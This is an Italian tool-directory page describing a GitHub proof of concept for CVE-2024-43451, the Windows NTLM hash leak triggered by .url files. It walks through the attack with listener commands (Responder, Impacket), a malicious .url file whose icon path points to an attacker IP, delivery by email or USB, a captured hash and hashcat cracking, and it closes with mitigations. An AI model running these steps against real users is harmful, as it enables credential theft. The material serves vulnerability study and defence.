Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — Riproduzione CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Strumenti/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Password CrackingStrumenti di PhishingRicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Riproduzione CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

Vedi Repository
61 mese faNon ancora revisionato

CVE-2024-43451 — Vulnerabilità di spoofing con divulgazione dell'hash NTLM di Windows

Panoramica

CVE-2024-43451 è una vulnerabilità di spoofing con divulgazione dell'hash NTLMv2 in Windows. Consente a un attaccante remoto non autenticato di divulgare l'hash NTLM della vittima convincendola a interagire con un file di collegamento .url dannoso. La vulnerabilità viene attivata con un'interazione minima dell'utente: è sufficiente fare clic con il tasto destro, eliminare o spostare il file per divulgare l'hash. Ha un punteggio CVSS di 6.5 (Medio) ed è stata sfruttata attivamente in natura. CISA l'ha aggiunta al catalogo Known Exploited Vulnerabilities (KEV).

Dettagli tecnici

Autenticazione NTLM

NTLM (NT LAN Manager) è un protocollo di autenticazione challenge-response utilizzato da Windows. Quando un client tenta di accedere a una risorsa tramite SMB, client e server eseguono un handshake:

  1. Il client invia un NEGOTIATE_MESSAGE contenente le capacità supportate.
  2. Il server risponde con un CHALLENGE_MESSAGE contenente un nonce di 8 byte (challenge del server).
  3. Il client risponde con un AUTHENTICATE_MESSAGE contenente l'hash NTLMv2 — un HMAC-MD5 della challenge combinato con l'hash della password dell'utente, il nome utente e il dominio.

Se un attaccante può osservare o innescare un tentativo di autenticazione NTLM verso una macchina che controlla, l'AUTHENTICATE_MESSAGE catturato può essere decifrato offline per recuperare la password in chiaro.

Formato del file .url

Un file .url è un file di collegamento utilizzato da Internet Explorer e Windows Explorer per memorizzare collegamenti. È un file in formato INI con una sezione [InternetShortcut]. I campi critici per lo sfruttamento sono:

  • URL= — l'URL di destinazione che Windows aprirà.
  • IconFile= — un percorso UNC opzionale a una risorsa icona. Quando Windows Explorer visualizza il file, tenta automaticamente di recuperare l'icona dalla condivisione remota, innescando un tentativo di autenticazione NTLM verso il server dell'attaccante.

Vettore d'attacco

L'attaccante crea un file .url con un parametro IconFile che punta a \\attacker-ip\share\icon.ico. Quando la vittima:

  • fa clic con il tasto destro sul file (Windows Explorer recupera l'icona per il menu contestuale),
  • sposta o copia il file (l'icona viene riletta), oppure
  • elimina il file (l'icona viene recuperata per la finestra di dialogo del Cestino),

Windows Explorer tenta di caricare l'icona dal percorso UNC, inviando l'hash NTLMv2 della vittima al listener SMB dell'attaccante (ad es. Responder).

Versioni interessate

Tutte le versioni supportate di Windows precedenti all'aggiornamento Patch Tuesday di novembre 2024:

  • Windows 10 (tutte le versioni)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Anche le versioni precedenti non supportate sono probabilmente vulnerabili, ma non riceveranno patch.

Configurazione dello sfruttamento

Requisiti

  • Macchina dell'attaccante: Linux o Windows con uno strumento di cattura SMB (ad es. Responder, smbserver di Impacket o Inveigh).
  • Macchina della vittima: qualsiasi sistema Windows non aggiornato.
  • Accesso di rete: la vittima deve poter raggiungere l'IP dell'attaccante sulla porta 445 (SMB).

Strumenti

ToolDescrizione
ResponderPoisoner LLMNR/NBT-NS/mDNS con server SMB integrato per la cattura di hash
Impacket

Passaggi per la riproduzione

1. Avviare il listener SMB (macchina dell'attaccante)

Usando Responder:

root@kitploit:~
sudo responder -I eth0 -v

Oppure usando Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Generare il file .url dannoso

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Consegnare il file alla vittima

  • Allegato email, drop tramite USB, condivisione file o download web.

4. Interazione della vittima

Una qualsiasi delle seguenti azioni innesca la divulgazione dell'hash:

  • Clic con il tasto destro → l'icona viene recuperata per il menu contestuale → handshake NTLM inviato all'attaccante
  • Eliminazione → l'icona viene recuperata per la finestra di conferma
  • Spostamento/Copia → l'icona viene riletta dal percorso UNC
  • Semplicemente visualizzare la cartella in visualizzazione Dettagli o Icone (caricamento dell'icona)

5. Catturare l'hash

Il listener SMB dell'attaccante riceve un hash NTLMv2:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Decifrare l'hash (offline)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Prova di concetto

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Mitigazioni

Riferimenti

  • Microsoft Security Response Center — CVE-2024-43451
  • Catalogo CISA Known Exploited Vulnerabilities
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — attacchi mirati all'Ucraina
  • Analisi della campagna UAC-0194 / SparkRAT
Scarica lo strumento
smbserver.py può essere utilizzato per ospitare una semplice condivisione SMB
InveighStrumento di cattura NTLM basato su PowerShell per Windows
MitigazioneDescrizione
Applicare la patch di novembre 2024Installare l'aggiornamento di sicurezza Microsoft da KB5044285
Bloccare l'SMB in uscita (porta 445)Impedire che gli hash NTLM lascino il perimetro di rete
Disabilitare NTLM dove possibileUtilizzare l'autenticazione solo Kerberos
Abilitare la firma SMBPreviene gli attacchi relay anche se gli hash vengono catturati
Formazione sulla consapevolezza degli utentiEducare gli utenti a non interagire con file .url inaspettati
Limitare la gestione dei file .urlUsare Criteri di gruppo per bloccare l'esecuzione o la consegna via email dei file .url